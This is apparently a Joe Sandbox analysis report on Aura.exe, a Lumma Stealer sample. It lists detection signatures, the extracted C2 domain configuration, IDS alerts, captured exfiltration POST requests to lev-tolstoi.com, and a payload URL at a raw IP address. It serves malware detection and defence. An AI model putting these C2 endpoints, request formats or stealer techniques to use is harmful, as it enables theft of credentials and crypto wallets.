Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aura.exe

Overview

General Information

Sample name:Aura.exe
Analysis ID:1581514
MD5:fd5fba5d5bef2952443b96241ffa5814
SHA1:c6613e363bec49bdf5eb98ccf0f4ee85615cad29
SHA256:08205d107a6b14818a12e3c8e30c3c7c3300e439359dfc0c99ed026815deca41
Tags:exeLummaStealersigneduser-ventoy
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Aura.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: FD5FBA5D5BEF2952443B96241FFA5814)
    • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Aura.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: FD5FBA5D5BEF2952443B96241FFA5814)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "screwamusresz.buzz", "inherineau.buzz", "appliacnesot.buzz", "scentniej.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "mindhandru.buzz"], "Build id": "BVnUqo--@hitok4111"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1863800274.000000000341B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1842452334.0000000003427000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1842261348.0000000003424000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Aura.exe PID: 7412JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: Aura.exe PID: 7412JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:47:27.879814+010020283713Unknown Traffic192.168.2.44973423.55.153.106443TCP
                2024-12-27T23:47:30.304703+010020283713Unknown Traffic192.168.2.449735104.21.66.86443TCP
                2024-12-27T23:47:32.346762+010020283713Unknown Traffic192.168.2.449736104.21.66.86443TCP
                2024-12-27T23:47:35.367774+010020283713Unknown Traffic192.168.2.449737104.21.66.86443TCP
                2024-12-27T23:47:37.730606+010020283713Unknown Traffic192.168.2.449738104.21.66.86443TCP
                2024-12-27T23:47:40.040652+010020283713Unknown Traffic192.168.2.449739104.21.66.86443TCP
                2024-12-27T23:47:42.651807+010020283713Unknown Traffic192.168.2.449741104.21.66.86443TCP
                2024-12-27T23:47:45.213010+010020283713Unknown Traffic192.168.2.449743104.21.66.86443TCP
                2024-12-27T23:47:49.425230+010020283713Unknown Traffic192.168.2.449747104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:47:31.062522+010020546531A Network Trojan was detected192.168.2.449735104.21.66.86443TCP
                2024-12-27T23:47:33.123035+010020546531A Network Trojan was detected192.168.2.449736104.21.66.86443TCP
                2024-12-27T23:47:50.180498+010020546531A Network Trojan was detected192.168.2.449747104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:47:31.062522+010020498361A Network Trojan was detected192.168.2.449735104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:47:33.123035+010020498121A Network Trojan was detected192.168.2.449736104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:47:36.327711+010020480941Malware Command and Control Activity Detected192.168.2.449737104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:47:45.224331+010028438641A Network Trojan was detected192.168.2.449743104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:47:28.679355+010028586661Domain Observed Used for C2 Detected192.168.2.44973423.55.153.106443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://lev-tolstoi.com/rAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apimvAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apilAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/pi(Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/api1Avira URL Cloud: Label: malware
                Source: 00000000.00000002.1675524552.000000000456B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "hummskitnj.buzz", "screwamusresz.buzz", "inherineau.buzz", "appliacnesot.buzz", "scentniej.buzz", "cashfuzysao.buzz", "rebuildeso.buzz", "mindhandru.buzz"], "Build id": "BVnUqo--@hitok4111"}
                Source: Aura.exeReversingLabs: Detection: 34%
                Source: Aura.exeJoe Sandbox ML: detected
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: BVnUqo--@hitok4111
                Source: C:\Users\user\Desktop\Aura.exeCode function: 2_2_00415729 CryptUnprotectData,2_2_00415729
                Source: Aura.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: C:\Users\user\Desktop\Aura.exeCode function: 0_2_000C1FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_000C1FE9
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_0043F080
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov ecx, eax2_2_0040B11D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]2_2_0043D929
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov ecx, eax2_2_004269E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], DA026237h2_2_00423257
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+6ED1A348h]2_2_004382F0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h2_2_004382F0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]2_2_0043D357
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov eax, edx2_2_0040C404
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042CD4D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [edi], ax2_2_0040C551
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+000001F0h]2_2_00415729
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+000001F0h]2_2_00415729
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 344CE4E0h2_2_00415729
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0041C051
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then lea ebx, dword ptr [eax+eax]2_2_0041C051
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042D05A
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_0041F0E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00435880
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042D0AE
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi]2_2_0043B910
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004221E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004221E0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then jmp eax2_2_0043E1F4
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+0Ah]2_2_0041C980
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-67h]2_2_00425986
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0041B18C
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 4B1BF3DAh2_2_0041499B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi]2_2_0041499B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0827F28Dh2_2_0041499B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [ecx+esi*8], 37A3DD63h2_2_0041499B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00429241
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0042AAE0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh2_2_00438AE0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edx], bl2_2_004092A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov ecx, eax2_2_004092A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov edx, ecx2_2_0042B3C0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3A8FE122h]2_2_00419BE0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00419BE0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 11A82DE9h2_2_00419BE0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then jmp eax2_2_00428BFE
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]2_2_00439459
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+000001F0h]2_2_00415C3B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 344CE4E0h2_2_00415C3B
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00429241
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx edi, byte ptr [ebp+esi-2Ch]2_2_0043DCE7
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then jmp eax2_2_00424C80
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042A4B0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00422540
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407500
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov edx, ecx2_2_00438D10
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 6E87DD67h2_2_00438D10
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h2_2_00438D10
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then test eax, eax2_2_00438D10
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp edx, esi2_2_00438D10
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov ecx, eax2_2_0041B5DD
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [esi], ax2_2_0041D5EC
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx ebx, bx2_2_0042459E
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then cmp cl, 0000002Eh2_2_00426E50
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00426E50
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042C62D
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov word ptr [esi], ax2_2_0041D603
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042C62F
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042DE30
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1Eh]2_2_004096A0
                Source: C:\Users\user\Desktop\Aura.exeCode function: 4x nop then mov edi, ecx2_2_0041BF5D

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49737 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49743 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49734 -> 23.55.153.106:443
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NZT99NLH0EXMQ0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18144Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QGUKJY56F4XQMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8759Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AE5L39HWTNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20394Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y3EEH26WZIUZQ6OEFKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1258Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8Z6GI3CERO9K60User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 608294Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
                Source: Aura.exe, 00000002.00000002.3511215128.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exeS
                Source: Aura.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Aura.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: Aura.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Aura.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: Aura.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Aura.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: Aura.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Aura.exe, 00000002.00000003.1815244598.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Aura.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
